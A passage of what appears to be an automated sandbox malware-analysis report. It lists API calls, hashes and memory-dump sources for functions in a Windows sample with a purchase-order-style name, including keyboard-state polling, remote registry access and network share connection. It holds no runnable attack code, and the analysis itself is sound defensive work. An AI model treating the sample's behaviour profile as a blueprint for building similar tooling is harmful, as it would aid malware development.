                • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                • IsWindow.USER32(00000000), ref: 00443C3A
                • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                • String ID: BUTTON
                • API String ID: 1834419854-3405671355
                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                • LoadStringW.USER32(00000000), ref: 00454040
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • _wprintf.LIBCMT ref: 00454074
                • __swprintf.LIBCMT ref: 004540A3
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 455036304-4153970271
                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                Download Yara Rule
                APIs
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                • _memmove.LIBCMT ref: 00467EB8
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                • _memmove.LIBCMT ref: 00467F6C
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                • String ID:
                • API String ID: 2170234536-0
                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 00453CE0
                • SetKeyboardState.USER32(?), ref: 00453D3B
                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                • GetKeyState.USER32(000000A0), ref: 00453D75
                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                • GetKeyState.USER32(000000A1), ref: 00453DB5
                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                • GetKeyState.USER32(00000011), ref: 00453DEF
                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                • GetKeyState.USER32(00000012), ref: 00453E26
                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                • GetKeyState.USER32(0000005B), ref: 00453E5D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                Download Yara Rule
                APIs
                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                Download Yara Rule
                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                • DeleteObject.GDI32(?), ref: 0047151E
                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                • DeleteObject.GDI32(?), ref: 004715EA
                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                • String ID:
                • API String ID: 3218148540-0
                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                • String ID:
                • API String ID: 136442275-0
                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                Download Yara Rule
                APIs
                • _wcsncpy.LIBCMT ref: 00467490
                • _wcsncpy.LIBCMT ref: 004674BC
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • _wcstok.LIBCMT ref: 004674FF
                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                • _wcstok.LIBCMT ref: 004675B2
                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                • _wcslen.LIBCMT ref: 00467793
                • _wcscpy.LIBCMT ref: 00467641
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcslen.LIBCMT ref: 004677BD
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                • String ID: X
                • API String ID: 3104067586-3081909835
                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                Download Yara Rule
                APIs
                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                • _wcslen.LIBCMT ref: 0046CDB0
                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                Strings
                • NULL Pointer assignment, xrefs: 0046CEA6
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                • String ID: NULL Pointer assignment
                • API String ID: 440038798-2785691316
                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                Download Yara Rule
                APIs
                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                • _wcslen.LIBCMT ref: 004610A3
                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                • GetWindowRect.USER32(?,?), ref: 00461248
                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                • String ID: ThumbnailClass
                • API String ID: 4136854206-1241985126
                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                Download Yara Rule
                APIs
                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                • GetClientRect.USER32(?,?), ref: 00471A1A
                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                • DestroyIcon.USER32(?), ref: 00471AF4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                • String ID: 2
                • API String ID: 1331449709-450215437
                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                • __swprintf.LIBCMT ref: 00460915
                • __swprintf.LIBCMT ref: 0046092D
                • _wprintf.LIBCMT ref: 004609E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                • API String ID: 3054410614-2561132961
                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                Strings
                Memory Dump Source
